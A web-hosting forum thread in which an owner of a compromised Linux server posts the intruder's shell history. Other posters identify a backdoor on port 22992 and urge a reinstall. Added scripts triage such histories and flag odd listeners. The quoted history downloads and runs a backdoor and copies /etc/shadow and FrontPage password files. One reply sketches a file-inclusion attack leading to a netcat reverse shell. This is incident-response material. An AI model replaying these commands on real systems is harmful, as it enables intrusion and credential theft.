  1. #1

    my server hacked please help me

    Hello

    Today my server was hacked. When I looked at the top command in the morning I saw someone had entered and got e-mail from root,

    and I saw that the one who entered was root,

    then he changed the root password.

    I sent to the DC to reset the root password and they did,

    and I saw the hacker create a new user and enter with this user.

    But I saw that he did this command

    passwd root

    with this user and he changed the root password again,

    and he can stop the network and start to delete backups, then I sent to the DC to unplug this server.

    Now my server is online again but the hacker can enter and do that again.

    I have a lot of security in this box like

    APF - BFD - Modsec - chmod 000 compiler -- everything is updated ( php 4.4.4 - mysql - apache ) ...etc

    My kernel is 2.6.17.5-HN-2.3-P4

    so what must I do???

    please help

  2. #2
    Reinstall the OS. You've been compromised with no way of possibly knowing how deep it went. Then make sure that you take the security measures necessary to prevent this in the future. Aka:

    Use the latest OpenSSL, the latest OpenSSH. Do not use the RPM releases as they are old.

    Use hard passwords.

    Do a WHT search for server hardening for more details.
    Jakiao

  3. #3
    The hacker entered again now and I unplugged the server again.

    He entered with the user, but I need to know how he got root privileges???

    His .bash_history is

    cat /etc/passwd
    ls /var/named
    top
    ps
    bg
    cd /etc/init.d
    wget <<removed url>>
    chmod 777 dc
    ./dc
    ps
    apf
    apf -f
    cd /etc/apf
    ls
    pico conf.apf
    apf -s
    apf -r
    uname -a
    ls /var/named
    cd
    cd /home
    ls
    cd /
    ls
    cd backup
    ls
    cd ..
    ls
    cd home
    ls
    cd sprestore
    ls
    cd cprestore
    ls
    ls -all
    ls /var/named
    pico /home/*/public_html/_vti_pvt/service.pwd
    cat /home/*/public_html/_vti_pvt/service.pwd
    cat /home/*/public_html/_vti_pvt/access.cnf
    d
    cd ..
    ls


    cp -r /etc/shadow shadow.txt
    ls
    rm shadow.txt

    cp -r /etc/shadow shadow.txt
    chmod 755 shadow.txt
    rm shadow.txt
    history
    d
    ls /var/named
    w
    cd /home
    d
    cd hmel
    ls
    cd public_html/
    d
    cd uploads
    d
    Last edited by sirius; 10-02-2006 at 03:55 PM.
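An added example (not code from the thread) showing how a defender could triage a recovered shell history like the one posted above. The patterns are the ones visible in that history (download into /etc/init.d, chmod, running the download, copying /etc/shadow, touching APF); the sample history and the example.invalid URL are constructed, not the original file.

```shell
#!/bin/sh
# Constructed excerpt modelled on the history in the thread (not the original file).
SAMPLE_HISTORY='cat /etc/passwd
cd /etc/init.d
wget http://example.invalid/dc
chmod 777 dc
./dc
apf -f
pico conf.apf
cp -r /etc/shadow shadow.txt
rm shadow.txt
cd /home
ls'

# usage: triage_history < .bash_history
# Prints "<line-no>:<tag>:<command>" for each command that matches a
# post-compromise pattern; untagged lines are dropped so an analyst can
# jump straight to the interesting ones.
triage_history() {
    awk '
        { tag = "" }
        /^cat +\/etc\/passwd/                   { tag = "recon" }
        /^wget |^curl /                         { tag = "download" }
        /^chmod +(777|755|\+x) /                { tag = "make-executable" }
        /^\.\//                                 { tag = "run-downloaded" }
        /\/etc\/shadow/                         { tag = "credential-access" }
        /^passwd( |$)/                          { tag = "password-change" }
        /^apf +-f|^apf +-s|conf\.apf/           { tag = "firewall-tamper" }
        /\/etc\/init\.d/                        { tag = "persistence-dir" }
        tag != "" { print NR ":" tag ":" $0 }
    '
}

# Number of flagged lines in the embedded sample (used as a quick sanity check).
count_flags() {
    printf '%s\n' "$SAMPLE_HISTORY" | triage_history | wc -l | tr -d ' '
}

# Run against the embedded sample; on a real box feed the recovered
# history file instead: triage_history < /home/<user>/.bash_history
printf '%s\n' "$SAMPLE_HISTORY" | triage_history
```

Shell history is trivially editable by the intruder, so treat it as a lead for where to look (the init.d directory, the APF config, the shadow copy), not as a complete record.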

  4. #4
    Obviously you had software which was exploitable (example: OpenSSH wasn't updated to the latest version and the hacker gained entry that way).

    Look, your system has been compromised. You need to reinstall the OS.

    Seriously, though, read up on server hardening. There are several topics about it here on WHT.
    Jakiao

  5. #5
    But do you know anything about this

    <<removed url>>

    ???
    Can he get root with this exploit??

  6. #6
    He didn't need the root password. He was already logged in.

    The file he downloaded was a backdoor program. Aka: Even if you upgrade your software and change your root pass, with that installed he can always gain entry.

    Look, your system is screwed. You need to start from scratch.
    Jakiao

  7. #7
    Yup, Jakiao was right, you are hosed: unplug, reformat and reinstall.

    But thanks for putting up his bash history for us. It's kinda interesting... I went to his site:

    <<removed url>>

    I can read Hebrew but Arabic is not my expertise. Can anyone who knows more Arabic than I explain how illegal exactly that site is?
    Gavin Rogers, full time problem solver.

  8. #8
    Quote Originally Posted by gavin8or
    Yup, Jakiao was right, you are hosed: unplug, reformat and reinstall.

    But thanks for putting up his bash history for us. It's kinda interesting... I went to his site:

    <<removed url>>

    I can read Hebrew but Arabic is not my expertise. Can anyone who knows more Arabic than I explain how illegal exactly that site is?
    It is a web site that provides shared hosting services for hackers only! Hah!

  9. #9
    Since you have been rooted you will need to reload.

    The dc file above is just a backdoor that listens on port 22992, since it's running as root that's how access is being gained again.

    You can see that with

    netstat -npl | grep 22992

    -Scott
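An added example (not Scott's command or code from the thread) that turns the one-off `netstat -npl | grep 22992` check into a baseline comparison: every listening socket whose port is not on the expected list is reported with its program name. The netstat output below is a constructed sample in the `netstat -npl` format, with the thread's dc listener on 22992 included; the baseline ports are an assumption for this sample.

```shell
#!/bin/sh
# Constructed sample of `netstat -npl` output (not captured from the thread's server).
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1023/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1510/httpd
tcp        0      0 0.0.0.0:22992           0.0.0.0:*               LISTEN      4411/dc
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1388/mysqld
udp        0      0 0.0.0.0:53              0.0.0.0:*                           1200/named'

# usage: flag_unexpected_listeners "22 80 3306 53" < netstat-output
# Prints "proto port pid/program" for every tcp/udp listener whose local port
# is not in the space-separated baseline. The port is taken as the last
# colon-separated field of the local address, so IPv6 forms like :::22 work too.
flag_unexpected_listeners() {
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        $1 ~ /^(tcp|udp)6?$/ {
            m = split($4, addr, ":")
            port = addr[m]
            if (!(port in ok)) print $1, port, $NF
        }'
}

# Ports this host is expected to serve (assumption for the sample).
BASELINE_PORTS="22 80 3306 53"

# Runs the check against the embedded sample. On a live host replace with:
#   netstat -npl | flag_unexpected_listeners "$BASELINE_PORTS"
check_sample() {
    printf '%s\n' "$SAMPLE_NETSTAT" | flag_unexpected_listeners "$BASELINE_PORTS"
}

check_sample
```

A rootkitted box can lie to netstat, so an empty result here is not proof of a clean host; a non-empty one, as with the dc process, is enough to confirm the reload everyone in the thread is recommending.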

  10. #10
    Also, I wouldn't be surprised if a keylogger has been set up on the server via the SSHD binary. If one has, every single thing you type (passwords included) will be logged and sent to the hacker.

    After you reinstall the OS, be sure to use entirely new passwords. Make sure they're complicated too.
    Jakiao

  11. #11
    You need to determine how they managed to get root before simply reloading the OS. It's time to hire a professional admin instead of asking for help on the forums. Determine the source of entry and other issues, then fix the hole for the next OS reload.

  12. #12
    I'm willing to bet money the guy came in through an exploitable OpenSSH. If he's using one of the many common operating systems (excluding Fedora), then his up2date repository uses OpenSSH 3.9 or 3.6. There are some very nasty exploits in those which would allow root entry without the password.
    Jakiao

  13. #13
    Guys, did anybody catch the removed URL which was here!!??
    I need it.

  14. #14
    If you need 911 help and a total fix.... I would use totalserversolutions.com

    As far as I know, they can fix it all at any time.

  15. #15
    Yeah LinuxLover, it's time to nuke and pave.

    This hacker has set up shop on your box. Is it a shared box or dedicated?

    In either case you need to lock down your security. Hire a professional or do some scans to find holes. There are open source scanners you can use or third party SaaS that can monitor your server for vulnerabilities. These can do continual interval scans that keep you apprised of any new holes.

    But Jakiao is right. This dude/dudette has probably installed keyloggers and other hidden scripts. There really is no telling how deep he/she is. Reinstalling the OS is the easiest way to go. But first I would find out how they are getting in.

    Again, is it shared, dedicated, co-lo, VPS? How are you hosted?

  16. #16
    gotzaway ... why do you need the URL to the code?
    Jakiao

  17. #17
    I think the URL goes back to the hacker,
    isn't that so?

  18. #18
    Ouch, I think he rooted you with rootkits. It might be too late; do an OS reinstall.

  19. #19
    Hmmm, perhaps it wasn't an OpenSSH exploit as mentioned. Has anyone thought that perhaps the host could have been running a vulnerable PHP-based script that allowed Remote File Inclusions, and the "hacker" simply performed this exploit, included a remote file to run arbitrary code on the host's server, which would give him/her the same privs as root, then simply in the code used a wget to request a file from another remote location, downloaded that to the target box, then went ahead and used that file as a backdoor, or perhaps ran netcat to reverse connect back to the attacker, thus creating a "back-door", then whilst in the targeted machine changed passwords, downloaded and installed other hidden scripts/rootkits etc.?

    The one thing I can say is that everyone is 110% right on 2 things..

    1. Reformat the box indeed
    2. Hire a professional company to scan the machine, and look into your preinstalled scripts, such as Fantastico Deluxe, and make sure all of the files are up to date.

    Also make sure your passwords are strong and hard to guess. Perhaps set a base password requirement for all your clients, so they can't be compromised by weak passwords and have their accounts used as legit hack accounts.

    Thanks,

    -Shaun
